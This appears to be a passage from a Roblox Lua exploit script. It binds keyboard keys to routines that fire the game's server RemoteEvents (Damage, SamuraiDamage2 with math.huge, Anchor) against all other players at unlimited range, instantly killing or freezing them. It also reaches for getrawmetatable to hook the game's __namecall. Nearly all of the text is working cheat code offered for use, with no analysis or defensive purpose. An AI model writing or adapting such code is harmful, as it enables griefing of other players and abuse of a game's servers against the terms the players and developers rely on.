                                    game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*0, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*6), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
                                    game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*0, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*-6), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
                                    game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame * CFrame.new(math.sin(AuraSetter * 50)*-6, math.cos(AuraSetter * 50)*-6, math.sin(AuraSetter * 50)*0), 0, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 3, Color3.new(0 ,0 ,0), "", 1, 1)
                                    until pro == false
			end
		end))
		wait(0.935)
		pro = false
		       game:GetService("ReplicatedStorage").PlayerStrongPunch2:FireServer(Vector3.new(1, -0.3, 1), Vector3.new(1, -0.3, 1), BrickColor.new("Black "))
    game:GetService("ReplicatedStorage").PlayerStrongPunch2:FireServer(Vector3.new(2, -0.5, 2), Vector3.new(2, -0.5, 2), BrickColor.new("Black"))
    game:GetService("ReplicatedStorage").PlayerStrongPunch2:FireServer(Vector3.new(3, -0.7, 3), Vector3.new(3, -0.7, 3), BrickColor.new("Black"))
    game:GetService("ReplicatedStorage").PlayerStrongPunch2:FireServer(Vector3.new(4, -1, 4), Vector3.new(4, -1, 4), BrickColor.new("Black"))
		game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame , 10, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 30, Color3.new(0 ,0 ,0), "", 1, 1)

		       for i,v in pairs(game.Workspace.Entities:GetChildren()) do
        if v:FindFirstChild("Humanoid") and v:FindFirstChild("HumanoidRootPart") and v.Name ~= game.Players.LocalPlayer.Name then
            if (game.Players.LocalPlayer.Character.HumanoidRootPart.Position - v.HumanoidRootPart.Position).Magnitude < 50 then
   game:GetService("ReplicatedStorage").Anchor:FireServer(v["Torso"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Head"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Right Arm"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Left Arm"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Right Leg"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Left Leg"],true)
game:GetService("ReplicatedStorage").Damage12:FireServer(v.Humanoid, v.Head.CFrame, 0, 0, Vector3.new(0, 0, 0), .5, "", 1, 1)
    
            end
        end
    end
end
  
    		wait(1.5)
		game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
		game.Players.LocalPlayer.Character.Humanoid.JumpPower = 50
		                     
pro = false
 
Mouse.KeyDown:Connect(function(Key)
    		if Key == "f" then
    		    Pro()
end
end) 
function t()
                GlobalDebounce = true
                T[1] = true
                local RecordPoint = BodyParts.HumanoidRootPart.Position
                local AxeKick = Instance.new("Animation")
                AxeKick.AnimationId = "rbxassetid://3445853933"
                BodyParts.Humanoid.WalkSpeed = 0
                BodyParts.Humanoid.JumpPower = 0
                local AxeKickTrack = BodyParts.Humanoid:LoadAnimation(AxeKick)
                AxeKickTrack:Play()
                wait(.6)
                coroutine.resume(coroutine.create(function()
                    AxeKickTrack:AdjustSpeed(0)
                    wait(.3)
                    AxeKickTrack:Stop(.3)
                end))
                for Indx,Player in pairs(Players:GetPlayers()) do
                    if Player ~= LocalPlayer then
                        local PlayerCharacter = Player.Character
                        local PlayerHumanoid = PlayerCharacter:FindFirstChildOfClass("Humanoid")
                        local Magnitude = (RecordPoint-PlayerCharacter.HumanoidRootPart.Position).Magnitude
                        if Magnitude <= math.huge then
                            coroutine.resume(coroutine.create(function()
                                local LegPosition = BodyParts.Torso.Position
                                local HealthObj = Instance.new("Part")
                                HealthObj.Anchored = true
                                HealthObj.CanCollide = false
                                HealthObj.Transparency = 1
                                HealthObj.Size = Vector3.new(0,0,0)
                                HealthObj.Position = LegPosition
                                HealthObj.Parent = Character
                                for Indx2 = 0,1,.025 do
                                    HealthObj.Position = Quadatric(Indx2,LegPosition,(PlayerCharacter.HumanoidRootPart.Position+LegPosition)/2 + Vector3.new(0,Magnitude,0),PlayerCharacter.HumanoidRootPart.Position)
                                    Remotes.Damage:FireServer(BodyParts.Humanoid,HealthObj.CFrame,0.5,.1,Vector3.new(0,0,0),"rbxassetid://0",10,Color3.new(0,0,0),"rbxassetid://1091083826",0,0)
                                    Run.Heartbeat:Wait()
                                end
                                HealthObj:Destroy()
                                for i = 1,15 do
                                game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(PlayerHumanoid, PlayerCharacter.HumanoidRootPart.CFrame, 0, 0, Vector3.new(0, 0, 0), .5, "", 1, 1)
                                                                game:GetService("ReplicatedStorage").Damage12:FireServer(PlayerHumanoid, PlayerCharacter.HumanoidRootPart.CFrame, 0, 0, Vector3.new(0, 0, 0), .5, "", 1, 1)

                                Remotes.SamuraiDamage2:FireServer(PlayerHumanoid,math.huge)
                                Remotes.Damage:FireServer(BodyParts.Humanoid,PlayerCharacter.HumanoidRootPart.CFrame,99,.1,Vector3.new(0,0,0),"rbxassetid://0",99 ,Color3.new(0,0,0), "rbxassetid://0", 1, 1)
                                wait()
                                end
                            end))
                        end
                    end
                end
                wait(1)
                BodyParts.Humanoid.WalkSpeed = 30
                BodyParts.Humanoid.JumpPower = 150
                coroutine.resume(coroutine.create(function()
                    wait(.5)
                    GlobalDebounce = false
                end))
                coroutine.resume(coroutine.create(function()
                    wait(1)
                    T[1] = false
                end))
            end

    Mouse.KeyDown:Connect(function(Key)
    if Key == "t" then
			t()
			end
end)
local LastBottomObj
local Model = Instance.new("Model")
Model.Name = "Obj"
Model.Parent = chr
_G.shgtoss = function() 

    Model.Parent = chr

    local knifeass = Instance.new("Part")
    local knife = knifeass:Clone()
    knife.Anchored = false
    knife.CanCollide = false
    knife.Massless = true
    knife.Transparency = 1
    knife.Size = Vector3.new(30,30,30)
    knife.CFrame = hrp.CFrame * CFrame.new(0,0,0)
    knife.Parent = Model

    local boopyve = Instance.new("BodyVelocity")
    boopyve.MaxForce = Vector3.new(math.huge, math.huge, math.huge)
    boopyve.P = math.huge
    boopyve.Velocity = knife.CFrame.lookVector * 50
    boopyve.Parent = knife
    boopyve.Name = "Force"

    coroutine.resume(coroutine.create(function()
    game.Debris:AddItem(knife, 15)
    wait(15)
    knifeass:Destroy()
    Model.Parent = game.Workspace
    end))

    coroutine.resume(coroutine.create(function()
        local ProjectileAuraSetter = 0
        repeat
        wait()
            ProjectileAuraSetter = ProjectileAuraSetter + 1
            game.ReplicatedStorage.Damage:FireServer(human, knife.CFrame * CFrame.new(0,0,-10), 1, 0,Vector3.new(0, 0, 0), "rbxassetid://", 10, Color3.new(0, 0, 0), "rbxassetid://367499850", 0, 0)
   game:GetService("ReplicatedStorage").Damage12:FireServer(human, knife.CFrame * CFrame.new(0,0,-10) , 1, 0, Vector3.new(0, 0, 0), .5, "", 1, 1)

        until Model.Parent ~= chr
    end))

    local debounce = false
    
    -- deal damage if arm hits a humanoid
    local hitRegister = knife.Touched:Connect(function(hit)
        if hit.Parent:FindFirstChild("Humanoid") and hit.Parent ~= chr then
                if debounce == false then
                debounce = true
                delay(.01, function() debounce = false end)
            game.ReplicatedStorage.Berserk:FireServer(hit.Parent.Humanoid)
            game.ReplicatedStorage.Knock:FireServer(hit.Parent.Humanoid)
            for i = 1,25 do
            game:GetService("ReplicatedStorage").ULFDamage:FireServer(hit.Parent.Humanoid, hit.Parent.HumanoidRootPart.CFrame, 5, 0, Vector3.new(0, 0, 0), .05, "", 1, 1)
            end
   game:GetService("ReplicatedStorage").Damage12:FireServer(hit.Parent.Humanoid, hit.Parent.HumanoidRootPart.CFrame, 5, 0, Vector3.new(0, 0, 0), .5, "", 1, 1)
game:GetService("ReplicatedStorage").SamuraiDamage2:FireServer(hit.Parent.Humanoid, 69420 ^5487489 * math.huge)
            knifeass:Destroy()
            Model.Parent = game.Workspace
            end
        elseif(hit.Parent.Parent:FindFirstChild("Humanoid")) and hit.Parent ~= chr then
                if debounce == false then
                debounce = true
                delay(.01, function() debounce = false end)
            game.ReplicatedStorage.Berserk:FireServer(hit.Parent.Humanoid)
            game.ReplicatedStorage.Knock:FireServer(hit.Parent.Humanoid)
            for i = 1,25 do
            game:GetService("ReplicatedStorage").ULFDamage:FireServer(hit.Parent.Humanoid, hit.Parent.HumanoidRootPart.CFrame, 5, 0, Vector3.new(0, 0, 0), .05, "", 1, 1)
            end
   game:GetService("ReplicatedStorage").Damage12:FireServer(hit.Parent.Humanoid, hit.Parent.HumanoidRootPart.CFrame, 5, 0, Vector3.new(0, 0, 0), .75, "", 1, 1)
game:GetService("ReplicatedStorage").SamuraiDamage2:FireServer(hit.Parent.Humanoid, 69420 ^5487489 * math.huge)
            knifeass:Destroy()
            Model.Parent = game.Workspace
            end
        end
    end)
end

local tossactive = false
mouse.KeyDown:Connect(function(key)
    if key == 'h' then
        tossactive = true
        
        game:GetService("ReplicatedStorage").ParticleEvent:FireServer("aura")
     
        wait(0.1)
        game:GetService("ReplicatedStorage").ParticleEvent:FireServer("noaura")
        wait(0.4)
        _G.shgtoss()
        wait(0.2)
 
        repeat wait() until Model.Parent == game.Workspace
        wait(2.5)
        tossactive = false
    end
end)
local eas = false
    Mouse.KeyDown:Connect(function(Key)
    if Key == "=" then
    if eas == false then
    eas = true
		rStorage.RTZ:FireServer(true)
	 
		elseif eas == true then
		eas = false
		rStorage.RTZ:FireServer(false)
	 
		end
		end
end)
local LastBottomObj
local asd = Instance.new("Model")
asd.Name = "Obj"
asd.Parent = Character
local ase = Instance.new("Part")
ase.Anchored = true
ase.CanCollide = false
ase.Massless = true
ase.Transparency = 1
ase.Size = Vector3.new(1,1,1)
ase.Parent = Model
local assas = 200
mouse.KeyDown:connect(function(key)
	if key == ";" then
	    

	 
		repeat
		    		ase.CFrame = hrp.CFrame * CFrame.new(0,assas,0)

		    assas = assas - 0.25
		   rStorage.PlayerStrongPunch2:FireServer(Vector3.new(-30, -4, -30), Vector3.new(-15, -4, -15), BrickColor.new("Black"))
   		   game:GetService("ReplicatedStorage").Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, ase.CFrame,3, 0,Vector3.new(0,0,0),  "rbxassetid://", 15,Color3.new(0,0,0),"", 0, 0)
   		   wait()
		until human.Health == 0 or human.Health < 0 or assas == 0
 		game.ReplicatedStorage.Damage:FireServer(game.Players.LocalPlayer.Character.Humanoid, game.Players.LocalPlayer.Character["Torso"].CFrame , 25, 0, Vector3.new(nil, nil,nil), "rbxassetid://245751634", 30, Color3.new(0 ,0 ,0), "", 1, 1)

		       for i,v in pairs(game.Workspace.Entities:GetChildren()) do
        if v:FindFirstChild("Humanoid") and v:FindFirstChild("HumanoidRootPart") and v.Name ~= game.Players.LocalPlayer.Name then
            if (game.Players.LocalPlayer.Character.HumanoidRootPart.Position - v.HumanoidRootPart.Position).Magnitude < math.huge then
                for i = 1,10,1 do
                                                game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(game.Players.LocalPlayer.Character.Humanoid, ase.CFrame, 0, 0, Vector3.new(0, 0, 0), 9, "", 1, 1)
                                                wait()
                                                end
for i =  1,10,1 do
   game:GetService("ReplicatedStorage").Anchor:FireServer(v["Torso"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Head"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Right Arm"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Left Arm"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Right Leg"],true)
game:GetService("ReplicatedStorage").Anchor:FireServer(v["Left Leg"],true)
game:GetService("ReplicatedStorage").SamuraiDamage2:FireServer(v.Humanoid, math.huge)
    game:GetService("ReplicatedStorage").SamuraiDamage2:FireServer(v.Humanoid, math.huge)
game:GetService("ReplicatedStorage").SamuraiDamage2:FireServer(v.Humanoid, math.huge)
                                game:GetService("ReplicatedStorage").Damage12Enderman:FireServer(v.Humanoid, v.HumanoidRootPart.CFrame, 0, 0, Vector3.new(0, 0, 0), 0.9, "", 1, 1)
                                wait()
                                end
                                assas = 200


            end
        end
    end
end
end)
local RawGameTable = getrawmetatable(game)
local oldNamecall = RawGameTable.__namecall


-- (RTZ) Counter
rStorage.RTZClient.OnClientEvent:connect(function(GivenPlayer)
	if GivenPlayer ~= Player then
		local Humanoid = GivenPlayer.Character.Humanoid
						local esa = math.random(1,2)
						if esa == 1 then
						    		local ass1 = Player.Character.Humanoid:LoadAnimation(AnimationTable.uia)
						    ass1:Play()
						elseif esa == 2 then
						    	local ass2 = Player.Character.Humanoid:LoadAnimation(AnimationTable.uib)
					        ass2:Play()
	
				            end


	end
end)

coroutine.resume(coroutine.create(function()
	for i = 1, #CaveSounds do
		PreloadAudio(CaveSounds[i])
	end
	for i = 1, #Songs do
		PreloadAudio(Songs[i].ID)
	end
	PreloadAudio(4693807000)
	PreloadAudio(4988868452)
	PreloadAudio(5004316774)
	PreloadAudio(5067081732)
	PreloadAudio(5002748505)
	PreloadAudio(142684400)
	PreloadAudio(5128453901)
	PreloadAudio(1996970202)
	PreloadAudio(5296211749)
	PreloadAudio(485221165)
	PreloadAudio(4909544237)
	PreloadAudio(5186302649)
	PreloadAudio(701184936)
	PreloadAudio(3164296220)
	PreloadAudio(148148455)
	PreloadAudio(143639913)
	PreloadAudio(3650195003)
	PreloadAudio(2636947957)
	PreloadAudio(5261530705)
	PreloadAudio(2338397562)
	PreloadAudio(1563991094)
	PreloadAudio(5002748179)
	PreloadAudio(5391916430)
	PreloadAudio(5385768747)
	PreloadAudio(3477214701)
	PreloadAudio(2554385540)
	PreloadAudio(410417720)
	PreloadAudio(159335846)
	PreloadAudio(2642969814)
	PreloadAudio(289556450)
	PreloadAudio(851889797)
	PreloadAudio(4220584519)
	PreloadAudio(4616924854)
	PreloadAudio(4594682362)
	PreloadAudio(5482711860)
	PreloadAudio(4775994326)
end))

